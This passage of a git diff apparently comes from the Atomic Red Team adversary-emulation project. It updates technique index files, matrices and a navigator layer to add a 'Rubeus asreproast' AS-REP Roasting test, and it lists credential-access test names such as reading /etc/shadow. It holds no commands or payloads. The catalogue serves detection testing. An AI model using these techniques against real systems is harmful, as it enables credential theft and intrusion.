dcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://
github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"c
omment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"ena
bled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003"
,"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560
.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"
T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}
,{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002"
,"score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1609","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"},{"techniqueID":"T1610","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"},{"techniqueID":"T1611","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]} \ No newline at end of file 
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index b49f990a..85b3626e 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -1,6 +1,7 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
 credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
+credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
 credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
 credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
 credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 79e806ce..50d5465f 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -1,4 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
+credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index cfa4b82f..df1ee3c0 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -4,7 +4,8 @@
 - Atomic Test #1: Access /etc/shadow (Local) [linux]
 - Atomic Test #2: Access /etc/passwd (Local) [linux]
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
+ - Atomic Test #1: Rubeus asreproast [windows]
 - [T1552.003 Bash History](../../T1552.003/T1552.003.md)
 - Atomic Test #1: Search Through Bash History [linux, macos]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index d0f286c9..3b558504 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1,7 +1,8 @@
 # Windows Atomic Tests by ATT&CK Tactic & Technique
 # credential-access
 - T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1558.004 AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1558.004 AS-REP Roasting](../../T1558.004/T1558.004.md)
+ - Atomic Test #1: Rubeus asreproast [windows]
 - T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1003.005 Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1056.004 Credential API Hooking](../../T1056.004/T1056.004.md)
diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md
index 089d1b3c..b79bc8fe 100644
--- a/atomics/Indexes/Matrices/matrix.md
+++ b/atomics/Indexes/Matrices/matrix.md
@@ -3,7 +3,7 @@
 |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
 | Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
-| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AS-REP Roasting](../../T1558.004/T1558.004.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
 | Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Active Setup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bash History](../../T1552.003/T1552.003.md) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) |
 | [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Add-ins](../../T1137.006/T1137.006.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Infrastructure Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index b6954e19..64ecf50a 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -2,7 +2,7 @@ | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| | Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AS-REP Roasting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Window Discovery](../../T1010/T1010.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Archive Collected Data](../../T1560/T1560.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Asymmetric 
